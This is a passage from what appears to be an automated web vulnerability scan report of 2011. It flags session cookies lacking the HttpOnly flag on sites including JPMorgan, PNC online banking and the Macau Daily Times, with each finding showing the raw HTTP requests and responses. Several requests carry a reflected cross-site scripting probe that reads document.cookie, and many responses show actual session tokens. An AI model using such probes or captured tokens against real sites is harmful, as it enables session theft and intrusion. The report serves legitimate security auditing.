11.138. http://www.jpmorgan.com/pages/jpmorgan/home/corporations  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/home/corporations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan/home/corporations HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT
Date: Thu, 03 Feb 2011 01:16:44 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=dngnNKBcnCxn90npyRDyBRmBnpqDC3L4fh11tPryZhTxzXDlLp0W!-1882927501; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http:
...[SNIP]...

11.139. http://www.jpmorgan.com/pages/jpmorgan/home/fi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/home/fi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan/home/fi HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT
Date: Thu, 03 Feb 2011 01:16:45 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=VKhMNKBdKXGg21v2VpNq1hs84JLkKRCZv8TTq0yYQW0GJck1BT00!-1882927501; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http:
...[SNIP]...

11.140. http://www.jpmorgan.com/pages/jpmorgan/home/individuals  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/home/individuals

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan/home/individuals HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT
Date: Thu, 03 Feb 2011 01:16:48 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=qLlxNKCQnmKCgKr8R2yplG5KPhTQD1P2b542BT6zCWczkzGRqQLv!-1882927501; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...

11.141. http://www.jpmorgan.com/pages/jpmorgan/home/publicsector  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/home/publicsector

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan/home/publicsector HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT
Date: Thu, 03 Feb 2011 01:16:46 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=ZnCLNKBp7KKQH0Lj93TByDF7HqFmm2TFz1KdT1wdzzw3MJ2hCdpY!-1882927501; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http:
...[SNIP]...

11.142. http://www.macaudailytimes.com.mo/cron_image.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /cron_image.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cron_image.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a9063f24d4a054f92c63; expires=Fri, 04-Feb-2011 01:31:10 GMT; path=/; domain=.macaudailytimes.com.mo
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

11.143. http://www.macaudailytimes.com.mo/imagecode.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /imagecode.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imagecode.html?article_id=21109 HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a9063f24d4a054f92c63; expires=Fri, 04-Feb-2011 01:31:10 GMT; path=/; domain=.macaudailytimes.com.mo
Vary: Accept-Encoding
Content-Type: image/png
Content-Length: 7521

.PNG
.
...IHDR...o...)........F...(IDATh..{ip..}.............&u."E..-QrR).........../qbg.......3V..uf.~....g....&..M-[v,..i..u.<.C$L..q,.]....~.cT....
X.>......!..#G.EaY..B.q:...G.$.e.N'...l..,UU    !.
...[SNIP]...

11.144. http://www.macaudailytimes.com.mo/js/lang.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /js/lang.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/lang.php HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a9063f24d4a054f92c63; expires=Fri, 04-Feb-2011 01:31:05 GMT; path=/; domain=.macaudailytimes.com.mo
Content-Type: application/x-javascript
Content-Length: 20378

if(typeof(vivvo) == 'undefined') var vivvo = {};vivvo.lang = {};
vivvo.lang.get = function(lang) {return (vivvo.lang[lang] != undefined) ? vivvo.lang[lang] : lang };
vivvo.lang.LNG_SEARCH_ALL = 'Searc
...[SNIP]...

11.145. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; expires=Fri, 04-Feb-2011 01:16:56 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...

11.146. https://www.merchantsummary.com/fnmsonline/fnms_ms_login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.merchantsummary.com
Path:   /fnmsonline/fnms_ms_login.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fnmsonline/fnms_ms_login.asp HTTP/1.1
Host: www.merchantsummary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 176
Content-Type: text/html
Location: https://www.Merchantsummary.com/fnms_ms_login.aspx?nb=1
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQEQCQCRA=BOIHGBOAAICKLCDGOIBCPALB; secure; path=/
Date: Wed, 02 Feb 2011 22:19:30 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.Merchantsummary.com/fnms_ms_login.aspx?nb=1">here</a>.</body>

11.147. https://www.mystreetscape.com/my/charteroneinvest  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.mystreetscape.com
Path:   /my/charteroneinvest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my/charteroneinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=311; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure
Content-length: 264
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33
Fscalleeid: ibweb311
Fselapsedtime: 9719
Connection: close


<html>

<head>


<title>
Charter One Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/charteroneinvest/jsp/
...[SNIP]...

11.148. https://www.mystreetscape.com/my/citizensinvest  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=321; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33
Fscalleeid: ibweb321
Fselapsedtime: 9769
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

11.149. http://www.oneofacard.com/generalinfo.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.oneofacard.com
Path:   /generalinfo.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /generalinfo.asp HTTP/1.1
Host: www.oneofacard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 02 Feb 2011 22:32:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /generalinfo2.asp
Content-Length: 138
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSABQSCC=CGBGOCGAHLGCAJHNOCOBCPKB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/generalinfo2.asp">here</a>.</body>

11.150. http://www.oneofacard.com/generalinfo.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.oneofacard.com
Path:   /generalinfo.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /generalinfo.asp HTTP/1.1
Host: www.oneofacard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 02 Feb 2011 22:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /generalinfo2.asp
Content-Length: 138
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARBSQDD=LANFCHGAPKNKIBJOHFFMMEGK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/generalinfo2.asp">here</a>.</body>

11.151. http://www.oneofacard.com/generalinfo2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.oneofacard.com
Path:   /generalinfo2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /generalinfo2.asp HTTP/1.1
Host: www.oneofacard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4353
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARBSQDD=MANFCHGAJMLLDLMDMBKANAFE; path=/
Cache-control: private

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"
...[SNIP]...

11.152. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinebanking.pnc.com
Path:   /alservlet/ForgotUserIdServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alservlet/ForgotUserIdServlet HTTP/1.1
Host: www.onlinebanking.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:02 GMT
Set-Cookie: TLTSID=9475541C2F1A102F354FD76FFB2DDB3C; Path=/; Domain=.pnc.com
Set-Cookie: TLTUID=9475541C2F1A102F354FD76FFB2DDB3C; Path=/; Domain=.pnc.com; Expires=Wed, 02-02-2021 22:20:02 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=a2rTe6HbXeEUyxbPOB/wDA==;GUID=1|SOvXcHCTZwCP2IOhhrT_-R3ODct1iF1OWGlj8LUk9syXcKsRohI8ZicVwfm-BX0p|L2Fsc2VydmxldC9Gb3Jnb3RVc2VySWRTZXJ2bGV0
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Cache-Control: no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate, no-store, private
Content-Length: 6173
Set-Cookie: JSESSIONID=0000nBH4sfMW7CTudVPIJFBuabh:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Set-Cookie: JSESSIONID=0000oDYthmTWj122o-2a9jXeLh-:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: NSC_q*xccpc-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423992;path=/;secure;httponly
Set-Cookie: NSC_q*xccpc-w0-htmc*443=ffffffffa9c1221345525d5f4f58455e445a4a420000;path=/;secure;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...

11.153. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinebanking.pnc.com
Path:   /alservlet/OnlineBankingServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alservlet/OnlineBankingServlet HTTP/1.1
Host: www.onlinebanking.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:02 GMT
Set-Cookie: TLTSID=942C620C2F1A102F3549D76FFB2DDB3C; Path=/; Domain=.pnc.com
Set-Cookie: TLTUID=942C620C2F1A102F3549D76FFB2DDB3C; Path=/; Domain=.pnc.com; Expires=Wed, 02-02-2021 22:20:02 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=a2rTe6HbXeEUyxbPOB/wDA==;GUID=1|SOvXcHCTZwCP2IOhhrT_-R3ODct1iF1OWGlj8LUk9syXcKsRohI8ZicVwfm-BX0p|L2Fsc2VydmxldC9PbmxpbmVCYW5raW5nU2VydmxldA..
Content-Length: 4786
Set-Cookie: JSESSIONID=0000BdPbwUSdfmxZ303XrJmvcTx:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Set-Cookie: JSESSIONID=0000ZZetK8QvUfDV8Q-gaArIsLv:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=299
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: NSC_q*xccpc-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423992;path=/;secure;httponly
Set-Cookie: NSC_q*xccpc-w0-htmc*443=ffffffffa9c1221345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>PNC Bank Online Banking</title>
<meta http-equiv="Expires" content="
...[SNIP]...

11.154. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:53 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3gpidtp18sji9mbnc5ikeu67s3; expires=Sat, 26-Feb-2011 01:34:13 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:49:54 GMT
ETag: "6ad65b857b676f9bc4304e9a1542a297"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.155. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=42d1eq3k1jalsbr539va4riur5; expires=Sat, 26-Feb-2011 01:34:12 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:46:24 GMT
ETag: "c8a6b2f76573aab17765d5878645eca9"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.156. https://www.pnc.com/webapp/sec/Forms.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
